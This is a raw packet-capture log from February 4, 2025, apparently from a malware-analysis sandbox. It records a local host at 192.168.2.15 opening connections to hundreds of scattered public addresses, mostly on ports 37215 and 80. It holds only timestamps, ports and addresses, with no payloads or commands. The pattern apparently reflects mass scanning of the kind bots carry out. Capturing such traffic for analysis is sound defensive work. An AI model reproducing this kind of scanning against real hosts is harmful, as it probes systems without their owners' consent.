                                                          Feb 4, 2025 18:11:21.465909958 CET1064037215192.168.2.15197.148.190.223
                                                          Feb 4, 2025 18:11:21.465909958 CET1064037215192.168.2.15197.168.220.2
                                                          Feb 4, 2025 18:11:21.465912104 CET1064037215192.168.2.15156.78.250.100
                                                          Feb 4, 2025 18:11:21.465914965 CET1064037215192.168.2.15156.173.50.189
                                                          Feb 4, 2025 18:11:21.465914965 CET1064037215192.168.2.15197.197.139.229
                                                          Feb 4, 2025 18:11:21.465914965 CET1064037215192.168.2.15197.195.208.223
                                                          Feb 4, 2025 18:11:21.465915918 CET1064037215192.168.2.1541.188.127.211
                                                          Feb 4, 2025 18:11:21.465915918 CET1064037215192.168.2.1541.199.241.73
                                                          Feb 4, 2025 18:11:21.465915918 CET1064037215192.168.2.1541.133.238.8
                                                          Feb 4, 2025 18:11:21.465928078 CET1064037215192.168.2.15197.227.142.53
                                                          Feb 4, 2025 18:11:21.465919971 CET1064037215192.168.2.15197.185.121.66
                                                          Feb 4, 2025 18:11:21.465919971 CET1064037215192.168.2.1541.80.143.0
                                                          Feb 4, 2025 18:11:21.465933084 CET1064037215192.168.2.1541.130.205.241
                                                          Feb 4, 2025 18:11:21.465945005 CET1064037215192.168.2.15197.23.170.61
                                                          Feb 4, 2025 18:11:21.465945005 CET1064037215192.168.2.1541.84.19.52
                                                          Feb 4, 2025 18:11:21.465945959 CET1064037215192.168.2.15156.121.102.123
                                                          Feb 4, 2025 18:11:21.465949059 CET1064037215192.168.2.1541.193.20.208
                                                          Feb 4, 2025 18:11:21.465949059 CET1064037215192.168.2.1541.81.227.179
                                                          Feb 4, 2025 18:11:21.465949059 CET1064037215192.168.2.15156.10.87.4
                                                          Feb 4, 2025 18:11:21.465954065 CET1064037215192.168.2.1541.141.228.242
                                                          Feb 4, 2025 18:11:21.465955973 CET1064037215192.168.2.15197.217.7.180
                                                          Feb 4, 2025 18:11:21.465955973 CET1064037215192.168.2.15156.90.21.168
                                                          Feb 4, 2025 18:11:21.465955973 CET1064037215192.168.2.1541.243.43.96
                                                          Feb 4, 2025 18:11:21.465961933 CET1064037215192.168.2.15197.5.91.120
                                                          Feb 4, 2025 18:11:21.465962887 CET1064037215192.168.2.15197.217.139.227
                                                          Feb 4, 2025 18:11:21.465967894 CET1064037215192.168.2.15156.80.155.19
                                                          Feb 4, 2025 18:11:21.465967894 CET1064037215192.168.2.1541.66.137.210
                                                          Feb 4, 2025 18:11:21.465974092 CET1064037215192.168.2.15197.137.66.169
                                                          Feb 4, 2025 18:11:21.465974092 CET1064037215192.168.2.15156.237.166.125
                                                          Feb 4, 2025 18:11:21.465974092 CET1064037215192.168.2.15197.9.247.186
                                                          Feb 4, 2025 18:11:21.465976000 CET1064037215192.168.2.1541.254.216.97
                                                          Feb 4, 2025 18:11:21.465976954 CET1064037215192.168.2.15156.142.65.199
                                                          Feb 4, 2025 18:11:21.465981007 CET1064037215192.168.2.15197.9.93.140
                                                          Feb 4, 2025 18:11:21.465987921 CET1064037215192.168.2.1541.111.106.41
                                                          Feb 4, 2025 18:11:21.465991974 CET1064037215192.168.2.1541.24.30.225
                                                          Feb 4, 2025 18:11:21.465995073 CET1064037215192.168.2.15156.90.64.9
                                                          Feb 4, 2025 18:11:21.466001034 CET1064037215192.168.2.15156.137.195.117
                                                          Feb 4, 2025 18:11:21.466001987 CET1064037215192.168.2.1541.118.216.41
                                                          Feb 4, 2025 18:11:21.466001987 CET1064037215192.168.2.15156.246.212.215
                                                          Feb 4, 2025 18:11:21.466003895 CET1064037215192.168.2.1541.163.188.137
                                                          Feb 4, 2025 18:11:21.466003895 CET1064037215192.168.2.15197.118.127.146
                                                          Feb 4, 2025 18:11:21.466012955 CET1064037215192.168.2.1541.200.124.81
                                                          Feb 4, 2025 18:11:21.466016054 CET1064037215192.168.2.15156.176.127.136
                                                          Feb 4, 2025 18:11:21.466016054 CET1064037215192.168.2.15197.47.74.91
                                                          Feb 4, 2025 18:11:21.466017008 CET1064037215192.168.2.15156.134.219.124
                                                          Feb 4, 2025 18:11:21.466027021 CET1064037215192.168.2.15197.59.144.32
                                                          Feb 4, 2025 18:11:21.466027021 CET1064037215192.168.2.15156.63.82.7
                                                          Feb 4, 2025 18:11:21.466031075 CET1064037215192.168.2.15156.48.55.157
                                                          Feb 4, 2025 18:11:21.466031075 CET1064037215192.168.2.15156.141.82.114
                                                          Feb 4, 2025 18:11:21.466036081 CET1064037215192.168.2.15156.42.49.233
                                                          Feb 4, 2025 18:11:21.466036081 CET1064037215192.168.2.1541.22.106.247
                                                          Feb 4, 2025 18:11:21.466039896 CET1064037215192.168.2.1541.213.160.147
                                                          Feb 4, 2025 18:11:21.466047049 CET1064037215192.168.2.15197.69.153.182
                                                          Feb 4, 2025 18:11:21.466047049 CET1064037215192.168.2.1541.162.15.153
                                                          Feb 4, 2025 18:11:21.466047049 CET1064037215192.168.2.15156.32.217.9
                                                          Feb 4, 2025 18:11:21.466064930 CET1064037215192.168.2.15197.198.63.176
                                                          Feb 4, 2025 18:11:21.466065884 CET1064037215192.168.2.15156.176.110.252
                                                          Feb 4, 2025 18:11:21.466065884 CET1064037215192.168.2.15197.228.96.130
                                                          Feb 4, 2025 18:11:21.466067076 CET1064037215192.168.2.15156.249.118.130
                                                          Feb 4, 2025 18:11:21.466067076 CET1064037215192.168.2.15197.62.84.204
                                                          Feb 4, 2025 18:11:21.466072083 CET1064037215192.168.2.15156.0.203.166
                                                          Feb 4, 2025 18:11:21.466072083 CET1064037215192.168.2.15156.228.60.54
                                                          Feb 4, 2025 18:11:21.466073036 CET1064037215192.168.2.15156.14.194.133
                                                          Feb 4, 2025 18:11:21.466074944 CET1064037215192.168.2.1541.41.204.211
                                                          Feb 4, 2025 18:11:21.466075897 CET1064037215192.168.2.1541.216.216.206
                                                          Feb 4, 2025 18:11:21.466077089 CET1064037215192.168.2.15156.121.228.225
                                                          Feb 4, 2025 18:11:21.466089010 CET1064037215192.168.2.15156.18.208.35
                                                          Feb 4, 2025 18:11:21.466089010 CET1064037215192.168.2.15156.109.131.111
                                                          Feb 4, 2025 18:11:21.466089964 CET1064037215192.168.2.15156.191.116.21
                                                          Feb 4, 2025 18:11:21.466090918 CET1064037215192.168.2.1541.22.71.203
                                                          Feb 4, 2025 18:11:21.466109991 CET1064037215192.168.2.1541.151.228.50
                                                          Feb 4, 2025 18:11:21.466109991 CET1064037215192.168.2.15156.197.86.179
                                                          Feb 4, 2025 18:11:21.466111898 CET1064037215192.168.2.15197.224.237.226
                                                          Feb 4, 2025 18:11:21.466113091 CET1064037215192.168.2.15197.41.249.251
                                                          Feb 4, 2025 18:11:21.466114044 CET1064037215192.168.2.1541.167.29.13
                                                          Feb 4, 2025 18:11:21.466114998 CET1064037215192.168.2.15197.191.211.119
                                                          Feb 4, 2025 18:11:21.466115952 CET1064037215192.168.2.15197.31.241.161
                                                          Feb 4, 2025 18:11:21.466126919 CET1064037215192.168.2.15197.215.246.57
                                                          Feb 4, 2025 18:11:21.466126919 CET1064037215192.168.2.1541.80.204.224
                                                          Feb 4, 2025 18:11:21.466126919 CET1064037215192.168.2.15197.26.188.104
                                                          Feb 4, 2025 18:11:21.466129065 CET1064037215192.168.2.15156.172.50.86
                                                          Feb 4, 2025 18:11:21.466135025 CET1064037215192.168.2.1541.115.31.198
                                                          Feb 4, 2025 18:11:21.466135025 CET1064037215192.168.2.15197.234.172.38
                                                          Feb 4, 2025 18:11:21.466147900 CET1064037215192.168.2.1541.129.198.177
                                                          Feb 4, 2025 18:11:21.466147900 CET1064037215192.168.2.1541.131.158.52
                                                          Feb 4, 2025 18:11:21.466149092 CET1064037215192.168.2.15197.91.17.235
                                                          Feb 4, 2025 18:11:21.466149092 CET1064037215192.168.2.15156.123.156.189
                                                          Feb 4, 2025 18:11:21.466149092 CET1064037215192.168.2.15197.120.142.52
                                                          Feb 4, 2025 18:11:21.466154099 CET1064037215192.168.2.15156.33.193.174
                                                          Feb 4, 2025 18:11:21.466154099 CET1064037215192.168.2.15156.209.230.120
                                                          Feb 4, 2025 18:11:21.466154099 CET1064037215192.168.2.15156.119.185.54
                                                          Feb 4, 2025 18:11:21.466161013 CET1064037215192.168.2.1541.233.253.189
                                                          Feb 4, 2025 18:11:21.466162920 CET1064037215192.168.2.1541.184.10.147
                                                          Feb 4, 2025 18:11:21.466162920 CET1064037215192.168.2.1541.156.197.135
                                                          Feb 4, 2025 18:11:21.466170073 CET804399223.137.87.167192.168.2.15
                                                          Feb 4, 2025 18:11:21.466173887 CET1064037215192.168.2.1541.199.128.225
                                                          Feb 4, 2025 18:11:21.466177940 CET1064037215192.168.2.1541.59.116.84
                                                          Feb 4, 2025 18:11:21.466177940 CET1064037215192.168.2.15156.24.165.27
                                                          Feb 4, 2025 18:11:21.466177940 CET1064037215192.168.2.15197.225.133.135
                                                          Feb 4, 2025 18:11:21.466181993 CET1064037215192.168.2.15156.63.171.221
                                                          Feb 4, 2025 18:11:21.466185093 CET1064037215192.168.2.15156.247.210.47
                                                          Feb 4, 2025 18:11:21.466186047 CET1064037215192.168.2.15156.152.216.180
                                                          Feb 4, 2025 18:11:21.466186047 CET1064037215192.168.2.1541.51.108.233
                                                          Feb 4, 2025 18:11:21.466188908 CET1064037215192.168.2.1541.247.231.4
                                                          Feb 4, 2025 18:11:21.466196060 CET1064037215192.168.2.15197.161.59.27
                                                          Feb 4, 2025 18:11:21.466197014 CET1064037215192.168.2.15156.157.27.241
                                                          Feb 4, 2025 18:11:21.466202974 CET1064037215192.168.2.1541.80.91.255
                                                          Feb 4, 2025 18:11:21.466202974 CET1064037215192.168.2.15156.10.106.217
                                                          Feb 4, 2025 18:11:21.466207027 CET1064037215192.168.2.15197.30.56.167
                                                          Feb 4, 2025 18:11:21.466232061 CET1064037215192.168.2.1541.64.42.95
                                                          Feb 4, 2025 18:11:21.466356039 CET4399280192.168.2.1523.137.87.167
                                                          Feb 4, 2025 18:11:21.469151020 CET8010643180.142.123.27192.168.2.15
                                                          Feb 4, 2025 18:11:21.469166040 CET8010643117.127.29.44192.168.2.15
                                                          Feb 4, 2025 18:11:21.469177008 CET8010643158.116.133.144192.168.2.15
                                                          Feb 4, 2025 18:11:21.469188929 CET8010643186.177.39.200192.168.2.15
                                                          Feb 4, 2025 18:11:21.469197035 CET1064380192.168.2.15180.142.123.27
                                                          Feb 4, 2025 18:11:21.469212055 CET8010643179.210.59.211192.168.2.15
                                                          Feb 4, 2025 18:11:21.469218016 CET1064380192.168.2.15158.116.133.144
                                                          Feb 4, 2025 18:11:21.469224930 CET8010643194.139.104.203192.168.2.15
                                                          Feb 4, 2025 18:11:21.469233036 CET1064380192.168.2.15186.177.39.200
                                                          Feb 4, 2025 18:11:21.469237089 CET8010643219.172.14.29192.168.2.15
                                                          Feb 4, 2025 18:11:21.469248056 CET8039568183.119.84.214192.168.2.15
                                                          Feb 4, 2025 18:11:21.469249010 CET1064380192.168.2.15179.210.59.211
                                                          Feb 4, 2025 18:11:21.469259977 CET8010643126.24.223.98192.168.2.15
                                                          Feb 4, 2025 18:11:21.469261885 CET1064380192.168.2.15194.139.104.203
                                                          Feb 4, 2025 18:11:21.469269991 CET1064380192.168.2.15219.172.14.29
                                                          Feb 4, 2025 18:11:21.469279051 CET3956880192.168.2.15183.119.84.214
                                                          Feb 4, 2025 18:11:21.469293118 CET8010643166.123.231.179192.168.2.15
                                                          Feb 4, 2025 18:11:21.469300985 CET1064380192.168.2.15117.127.29.44
                                                          Feb 4, 2025 18:11:21.469305992 CET801064317.196.195.95192.168.2.15
                                                          Feb 4, 2025 18:11:21.469317913 CET8010643220.194.72.146192.168.2.15
                                                          Feb 4, 2025 18:11:21.469326019 CET1064380192.168.2.15166.123.231.179
                                                          Feb 4, 2025 18:11:21.469337940 CET1064380192.168.2.1517.196.195.95
                                                          Feb 4, 2025 18:11:21.469413042 CET1064380192.168.2.15220.194.72.146
                                                          Feb 4, 2025 18:11:21.469439030 CET1064380192.168.2.15126.24.223.98
                                                          Feb 4, 2025 18:11:21.469620943 CET8010643199.63.47.209192.168.2.15
                                                          Feb 4, 2025 18:11:21.469634056 CET80106432.113.145.26192.168.2.15
                                                          Feb 4, 2025 18:11:21.469646931 CET801064366.85.21.139192.168.2.15
                                                          Feb 4, 2025 18:11:21.469659090 CET8010643193.2.130.245192.168.2.15
                                                          Feb 4, 2025 18:11:21.469667912 CET1064380192.168.2.15199.63.47.209
                                                          Feb 4, 2025 18:11:21.469667912 CET1064380192.168.2.1566.85.21.139
                                                          Feb 4, 2025 18:11:21.469671965 CET801064370.252.93.59192.168.2.15
                                                          Feb 4, 2025 18:11:21.469671965 CET1064380192.168.2.152.113.145.26
                                                          Feb 4, 2025 18:11:21.469695091 CET801064374.202.42.9192.168.2.15
                                                          Feb 4, 2025 18:11:21.469700098 CET1064380192.168.2.15193.2.130.245
                                                          Feb 4, 2025 18:11:21.469700098 CET1064380192.168.2.1570.252.93.59
                                                          Feb 4, 2025 18:11:21.469707966 CET801064376.137.1.180192.168.2.15
                                                          Feb 4, 2025 18:11:21.469723940 CET8010643126.176.228.197192.168.2.15
                                                          Feb 4, 2025 18:11:21.469727993 CET1064380192.168.2.1574.202.42.9
                                                          Feb 4, 2025 18:11:21.469750881 CET4708680192.168.2.15187.194.10.196
                                                          Feb 4, 2025 18:11:21.469750881 CET1064380192.168.2.1576.137.1.180
                                                          Feb 4, 2025 18:11:21.469772100 CET8010643141.20.42.238192.168.2.15
                                                          Feb 4, 2025 18:11:21.469784975 CET801064386.35.202.69192.168.2.15
                                                          Feb 4, 2025 18:11:21.469796896 CET801064341.39.69.139192.168.2.15
                                                          Feb 4, 2025 18:11:21.469798088 CET1064380192.168.2.15126.176.228.197
                                                          Feb 4, 2025 18:11:21.469803095 CET1064380192.168.2.15141.20.42.238
                                                          Feb 4, 2025 18:11:21.469810009 CET8010643179.192.200.231192.168.2.15
                                                          Feb 4, 2025 18:11:21.469830036 CET1064380192.168.2.1541.39.69.139
                                                          Feb 4, 2025 18:11:21.469830990 CET801064374.93.106.203192.168.2.15
                                                          Feb 4, 2025 18:11:21.469844103 CET8010643161.225.186.189192.168.2.15
                                                          Feb 4, 2025 18:11:21.469846010 CET1064380192.168.2.1586.35.202.69
                                                          Feb 4, 2025 18:11:21.469847918 CET1064380192.168.2.15179.192.200.231
                                                          Feb 4, 2025 18:11:21.469858885 CET8010643190.1.187.23192.168.2.15
                                                          Feb 4, 2025 18:11:21.469871998 CET8010643113.60.71.8192.168.2.15
                                                          Feb 4, 2025 18:11:21.469877958 CET1064380192.168.2.15161.225.186.189
                                                          Feb 4, 2025 18:11:21.469882965 CET801064370.27.202.249192.168.2.15
                                                          Feb 4, 2025 18:11:21.469891071 CET1064380192.168.2.1574.93.106.203
                                                          Feb 4, 2025 18:11:21.469894886 CET1064380192.168.2.15190.1.187.23
                                                          Feb 4, 2025 18:11:21.469894886 CET801064324.76.98.2192.168.2.15
                                                          Feb 4, 2025 18:11:21.469911098 CET1064380192.168.2.1570.27.202.249
                                                          Feb 4, 2025 18:11:21.469913006 CET1064380192.168.2.15113.60.71.8
                                                          Feb 4, 2025 18:11:21.469923019 CET8010643193.158.34.34192.168.2.15
                                                          Feb 4, 2025 18:11:21.469935894 CET8010643195.210.137.30192.168.2.15
                                                          Feb 4, 2025 18:11:21.469948053 CET80106431.19.246.235192.168.2.15
                                                          Feb 4, 2025 18:11:21.469965935 CET1064380192.168.2.1524.76.98.2
                                                          Feb 4, 2025 18:11:21.469964981 CET1064380192.168.2.15195.210.137.30
                                                          Feb 4, 2025 18:11:21.469969034 CET8010643197.171.131.230192.168.2.15
                                                          Feb 4, 2025 18:11:21.469978094 CET1064380192.168.2.15193.158.34.34
                                                          Feb 4, 2025 18:11:21.469980001 CET1064380192.168.2.151.19.246.235
                                                          Feb 4, 2025 18:11:21.469990015 CET8010643176.116.3.194192.168.2.15
                                                          Feb 4, 2025 18:11:21.470000029 CET1064380192.168.2.15197.171.131.230
                                                          Feb 4, 2025 18:11:21.470001936 CET801064361.123.135.64192.168.2.15
                                                          Feb 4, 2025 18:11:21.470015049 CET801064354.130.141.170192.168.2.15
                                                          Feb 4, 2025 18:11:21.470026970 CET801064370.122.88.62192.168.2.15
                                                          Feb 4, 2025 18:11:21.470027924 CET1064380192.168.2.15176.116.3.194
                                                          Feb 4, 2025 18:11:21.470042944 CET801064350.40.250.2192.168.2.15
                                                          Feb 4, 2025 18:11:21.470048904 CET1064380192.168.2.1554.130.141.170
                                                          Feb 4, 2025 18:11:21.470061064 CET8046742187.194.10.196192.168.2.15
                                                          Feb 4, 2025 18:11:21.470061064 CET1064380192.168.2.1570.122.88.62
                                                          Feb 4, 2025 18:11:21.470067024 CET1064380192.168.2.1561.123.135.64
                                                          Feb 4, 2025 18:11:21.470076084 CET803417240.144.172.4192.168.2.15
                                                          Feb 4, 2025 18:11:21.470109940 CET3417280192.168.2.1540.144.172.4
                                                          Feb 4, 2025 18:11:21.470120907 CET1064380192.168.2.1550.40.250.2
                                                          Feb 4, 2025 18:11:21.470336914 CET8058714204.137.209.75192.168.2.15
                                                          Feb 4, 2025 18:11:21.470350027 CET3721541030197.51.196.232192.168.2.15
                                                          Feb 4, 2025 18:11:21.470813990 CET804033225.68.126.50192.168.2.15
                                                          Feb 4, 2025 18:11:21.470856905 CET5871480192.168.2.15204.137.209.75
                                                          Feb 4, 2025 18:11:21.470856905 CET4103037215192.168.2.15197.51.196.232
                                                          Feb 4, 2025 18:11:21.470900059 CET5655480192.168.2.15145.56.156.195
                                                          Feb 4, 2025 18:11:21.470900059 CET5655480192.168.2.15145.56.156.195
                                                          Feb 4, 2025 18:11:21.470957041 CET4033280192.168.2.1525.68.126.50
                                                          Feb 4, 2025 18:11:21.471590042 CET8040322144.229.87.242192.168.2.15
                                                          Feb 4, 2025 18:11:21.473442078 CET4032280192.168.2.15144.229.87.242
                                                          Feb 4, 2025 18:11:21.475148916 CET8047086187.194.10.196192.168.2.15
                                                          Feb 4, 2025 18:11:21.475235939 CET4708680192.168.2.15187.194.10.196
                                                          Feb 4, 2025 18:11:21.475636959 CET8056554145.56.156.195192.168.2.15
                                                          Feb 4, 2025 18:11:21.477431059 CET5689680192.168.2.15145.56.156.195
                                                          Feb 4, 2025 18:11:21.482212067 CET8056896145.56.156.195192.168.2.15
                                                          Feb 4, 2025 18:11:21.485420942 CET5689680192.168.2.15145.56.156.195
                                                          Feb 4, 2025 18:11:21.490530968 CET5089880192.168.2.1513.138.57.214
                                                          Feb 4, 2025 18:11:21.490535975 CET5928280192.168.2.15202.111.151.210
                                                          Feb 4, 2025 18:11:21.490542889 CET3749280192.168.2.15212.131.117.96
                                                          Feb 4, 2025 18:11:21.490545988 CET5557480192.168.2.15216.188.248.169
                                                          Feb 4, 2025 18:11:21.490551949 CET4113080192.168.2.1562.103.9.41
                                                          Feb 4, 2025 18:11:21.490551949 CET4136080192.168.2.1531.241.52.89
                                                          Feb 4, 2025 18:11:21.490559101 CET3533880192.168.2.15131.39.3.189
                                                          Feb 4, 2025 18:11:21.490557909 CET4061880192.168.2.15106.169.0.242
                                                          Feb 4, 2025 18:11:21.490560055 CET4164480192.168.2.15220.72.253.157
                                                          Feb 4, 2025 18:11:21.490560055 CET5212880192.168.2.1577.126.73.147
                                                          Feb 4, 2025 18:11:21.490560055 CET5729880192.168.2.1546.156.32.243
                                                          Feb 4, 2025 18:11:21.490571976 CET5758680192.168.2.15208.251.143.189
                                                          Feb 4, 2025 18:11:21.490571976 CET3446480192.168.2.1535.163.135.185
                                                          Feb 4, 2025 18:11:21.495358944 CET805089813.138.57.214192.168.2.15
                                                          Feb 4, 2025 18:11:21.497422934 CET5089880192.168.2.1513.138.57.214
                                                          Feb 4, 2025 18:11:21.509424925 CET5021680192.168.2.15180.142.123.27
                                                          Feb 4, 2025 18:11:21.512414932 CET8046742187.194.10.196192.168.2.15
                                                          Feb 4, 2025 18:11:21.514193058 CET8050216180.142.123.27192.168.2.15
                                                          Feb 4, 2025 18:11:21.514230013 CET5021680192.168.2.15180.142.123.27
                                                          Feb 4, 2025 18:11:21.516376019 CET8056554145.56.156.195192.168.2.15
                                                          Feb 4, 2025 18:11:21.522535086 CET5437280192.168.2.1558.27.47.222
                                                          Feb 4, 2025 18:11:21.522535086 CET4549280192.168.2.1581.230.225.130
                                                          Feb 4, 2025 18:11:21.522537947 CET4224080192.168.2.1590.177.70.10
                                                          Feb 4, 2025 18:11:21.522551060 CET5611680192.168.2.15219.254.135.78
                                                          Feb 4, 2025 18:11:21.522552013 CET3813080192.168.2.1550.131.163.50
                                                          Feb 4, 2025 18:11:21.522552013 CET4639280192.168.2.15131.220.215.91
                                                          Feb 4, 2025 18:11:21.522555113 CET4798680192.168.2.15142.103.194.116
                                                          Feb 4, 2025 18:11:21.522555113 CET5891080192.168.2.15194.148.187.253
                                                          Feb 4, 2025 18:11:21.522555113 CET4143480192.168.2.15158.9.210.119
                                                          Feb 4, 2025 18:11:21.522569895 CET4246080192.168.2.1598.228.221.176
                                                          Feb 4, 2025 18:11:21.522571087 CET5804080192.168.2.1551.139.218.36
                                                          Feb 4, 2025 18:11:21.522571087 CET4573080192.168.2.15176.100.12.176
                                                          Feb 4, 2025 18:11:21.522574902 CET3691280192.168.2.15152.23.93.45
                                                          Feb 4, 2025 18:11:21.522574902 CET4635280192.168.2.15139.225.240.172
                                                          Feb 4, 2025 18:11:21.522603035 CET5003080192.168.2.1562.3.220.66
                                                          Feb 4, 2025 18:11:21.527359962 CET804224090.177.70.10192.168.2.15
                                                          Feb 4, 2025 18:11:21.527374029 CET805437258.27.47.222192.168.2.15
                                                          Feb 4, 2025 18:11:21.529402971 CET5437280192.168.2.1558.27.47.222
                                                          Feb 4, 2025 18:11:21.529436111 CET4224080192.168.2.1590.177.70.10
                                                          Feb 4, 2025 18:11:21.545433998 CET4732880192.168.2.15117.127.29.44
                                                          Feb 4, 2025 18:11:21.550303936 CET8047328117.127.29.44192.168.2.15
                                                          Feb 4, 2025 18:11:21.553427935 CET4732880192.168.2.15117.127.29.44
                                                          Feb 4, 2025 18:11:21.554539919 CET4814437215192.168.2.15156.60.233.0
                                                          Feb 4, 2025 18:11:21.554541111 CET4499237215192.168.2.1541.7.140.151
                                                          Feb 4, 2025 18:11:21.554553986 CET4711037215192.168.2.15197.44.208.174
                                                          Feb 4, 2025 18:11:21.554553986 CET4161237215192.168.2.15156.193.79.196
                                                          Feb 4, 2025 18:11:21.554555893 CET6096037215192.168.2.1541.164.28.9
                                                          Feb 4, 2025 18:11:21.554555893 CET4023037215192.168.2.15156.80.185.156
                                                          Feb 4, 2025 18:11:21.554555893 CET3529837215192.168.2.1541.127.128.0
                                                          Feb 4, 2025 18:11:21.554569006 CET5002637215192.168.2.15156.206.254.225
                                                          Feb 4, 2025 18:11:21.554569960 CET4022837215192.168.2.15197.152.15.124
                                                          Feb 4, 2025 18:11:21.554569960 CET3870837215192.168.2.15197.198.35.16
                                                          Feb 4, 2025 18:11:21.554569006 CET4707837215192.168.2.1541.114.117.190
                                                          Feb 4, 2025 18:11:21.559384108 CET3721548144156.60.233.0192.168.2.15
                                                          Feb 4, 2025 18:11:21.559397936 CET372154499241.7.140.151192.168.2.15
                                                          Feb 4, 2025 18:11:21.559629917 CET4499237215192.168.2.1541.7.140.151
                                                          Feb 4, 2025 18:11:21.559629917 CET4499237215192.168.2.1541.7.140.151
                                                          Feb 4, 2025 18:11:21.559657097 CET4814437215192.168.2.15156.60.233.0
                                                          Feb 4, 2025 18:11:21.559734106 CET4499237215192.168.2.1541.7.140.151
                                                          Feb 4, 2025 18:11:21.564440966 CET372154499241.7.140.151192.168.2.15
                                                          Feb 4, 2025 18:11:21.586570024 CET3541637215192.168.2.15197.165.49.31
                                                          Feb 4, 2025 18:11:21.586570024 CET3877437215192.168.2.15197.211.217.174
                                                          Feb 4, 2025 18:11:21.586571932 CET6095237215192.168.2.15156.136.36.32
                                                          Feb 4, 2025 18:11:21.586606026 CET5338837215192.168.2.15197.224.174.21
                                                          Feb 4, 2025 18:11:21.586606026 CET5210437215192.168.2.15197.182.149.187
                                                          Feb 4, 2025 18:11:21.586612940 CET4699437215192.168.2.15156.131.45.150
                                                          Feb 4, 2025 18:11:21.586615086 CET5071037215192.168.2.15197.210.43.217
                                                          Feb 4, 2025 18:11:21.586616039 CET3519637215192.168.2.15156.118.79.234
                                                          Feb 4, 2025 18:11:21.586617947 CET5077237215192.168.2.1541.0.238.68
                                                          Feb 4, 2025 18:11:21.586615086 CET5553637215192.168.2.15156.82.174.2
                                                          Feb 4, 2025 18:11:21.586616039 CET3989237215192.168.2.15156.168.128.103
                                                          Feb 4, 2025 18:11:21.586615086 CET4605237215192.168.2.15156.97.22.124
                                                          Feb 4, 2025 18:11:21.586616039 CET3380637215192.168.2.15197.250.173.206
                                                          Feb 4, 2025 18:11:21.586626053 CET3608637215192.168.2.1541.89.164.219
                                                          Feb 4, 2025 18:11:21.586656094 CET3548637215192.168.2.15156.6.3.31
                                                          Feb 4, 2025 18:11:21.586657047 CET4415837215192.168.2.15197.14.226.63
                                                          Feb 4, 2025 18:11:21.586657047 CET4468837215192.168.2.15197.73.150.163
                                                          Feb 4, 2025 18:11:21.586658001 CET5721437215192.168.2.15156.232.100.5
                                                          Feb 4, 2025 18:11:21.586658955 CET4178037215192.168.2.1541.226.128.231
                                                          Feb 4, 2025 18:11:21.586659908 CET4448037215192.168.2.1541.168.203.41
                                                          Feb 4, 2025 18:11:21.586671114 CET3757080192.168.2.15158.116.133.144
                                                          Feb 4, 2025 18:11:21.586674929 CET4259837215192.168.2.15156.11.120.114
                                                          Feb 4, 2025 18:11:21.591939926 CET3721535416197.165.49.31192.168.2.15
                                                          Feb 4, 2025 18:11:21.591953993 CET3721538774197.211.217.174192.168.2.15
                                                          Feb 4, 2025 18:11:21.591967106 CET3721560952156.136.36.32192.168.2.15
                                                          Feb 4, 2025 18:11:21.592015982 CET6095237215192.168.2.15156.136.36.32
                                                          Feb 4, 2025 18:11:21.592015028 CET3541637215192.168.2.15197.165.49.31
                                                          Feb 4, 2025 18:11:21.592192888 CET3877437215192.168.2.15197.211.217.174
                                                          Feb 4, 2025 18:11:21.593426943 CET4506237215192.168.2.1541.7.140.151
                                                          Feb 4, 2025 18:11:21.598197937 CET372154506241.7.140.151192.168.2.15
                                                          Feb 4, 2025 18:11:21.601438999 CET4506237215192.168.2.1541.7.140.151
                                                          Feb 4, 2025 18:11:21.608434916 CET372154499241.7.140.151192.168.2.15
                                                          Feb 4, 2025 18:11:21.618540049 CET3482237215192.168.2.15156.229.156.25
                                                          Feb 4, 2025 18:11:21.618550062 CET4367237215192.168.2.15197.225.24.55
                                                          Feb 4, 2025 18:11:21.618555069 CET3459037215192.168.2.1541.160.92.139
                                                          Feb 4, 2025 18:11:21.618607998 CET5604437215192.168.2.15197.229.162.82
                                                          Feb 4, 2025 18:11:21.623425961 CET3721534822156.229.156.25192.168.2.15
                                                          Feb 4, 2025 18:11:21.623440027 CET3721543672197.225.24.55192.168.2.15
                                                          Feb 4, 2025 18:11:21.623454094 CET372153459041.160.92.139192.168.2.15
                                                          Feb 4, 2025 18:11:21.623503923 CET4367237215192.168.2.15197.225.24.55
                                                          Feb 4, 2025 18:11:21.623512030 CET3459037215192.168.2.1541.160.92.139
                                                          Feb 4, 2025 18:11:21.623532057 CET3482237215192.168.2.15156.229.156.25
                                                          Feb 4, 2025 18:11:21.629487991 CET3877437215192.168.2.15197.211.217.174
                                                          Feb 4, 2025 18:11:21.629487991 CET3541637215192.168.2.15197.165.49.31
                                                          Feb 4, 2025 18:11:21.629503012 CET4367237215192.168.2.15197.225.24.55
                                                          Feb 4, 2025 18:11:21.629504919 CET4506237215192.168.2.1541.7.140.151
                                                          Feb 4, 2025 18:11:21.629508018 CET3459037215192.168.2.1541.160.92.139
                                                          Feb 4, 2025 18:11:21.629528999 CET3482237215192.168.2.15156.229.156.25
                                                          Feb 4, 2025 18:11:21.629563093 CET4814437215192.168.2.15156.60.233.0
                                                          Feb 4, 2025 18:11:21.629563093 CET4814437215192.168.2.15156.60.233.0
                                                          Feb 4, 2025 18:11:21.634397030 CET3721538774197.211.217.174192.168.2.15
                                                          Feb 4, 2025 18:11:21.634412050 CET3721548144156.60.233.0192.168.2.15
                                                          Feb 4, 2025 18:11:21.634480000 CET3721543672197.225.24.55192.168.2.15
                                                          Feb 4, 2025 18:11:21.634481907 CET3877437215192.168.2.15197.211.217.174
                                                          Feb 4, 2025 18:11:21.634493113 CET372154506241.7.140.151192.168.2.15
                                                          Feb 4, 2025 18:11:21.634507895 CET3721535416197.165.49.31192.168.2.15
                                                          Feb 4, 2025 18:11:21.634520054 CET372153459041.160.92.139192.168.2.15
                                                          Feb 4, 2025 18:11:21.634541035 CET3721534822156.229.156.25192.168.2.15
                                                          Feb 4, 2025 18:11:21.634552956 CET4367237215192.168.2.15197.225.24.55
                                                          Feb 4, 2025 18:11:21.634557009 CET3541637215192.168.2.15197.165.49.31
                                                          Feb 4, 2025 18:11:21.634567976 CET3459037215192.168.2.1541.160.92.139
                                                          Feb 4, 2025 18:11:21.634577990 CET4506237215192.168.2.1541.7.140.151
                                                          Feb 4, 2025 18:11:21.634643078 CET3482237215192.168.2.15156.229.156.25
                                                          Feb 4, 2025 18:11:21.645433903 CET5152480192.168.2.15186.177.39.200
                                                          Feb 4, 2025 18:11:21.650270939 CET8051524186.177.39.200192.168.2.15
                                                          Feb 4, 2025 18:11:21.650337934 CET5152480192.168.2.15186.177.39.200
                                                          Feb 4, 2025 18:11:21.661437035 CET4822037215192.168.2.15156.60.233.0
                                                          Feb 4, 2025 18:11:21.666315079 CET3721548220156.60.233.0192.168.2.15
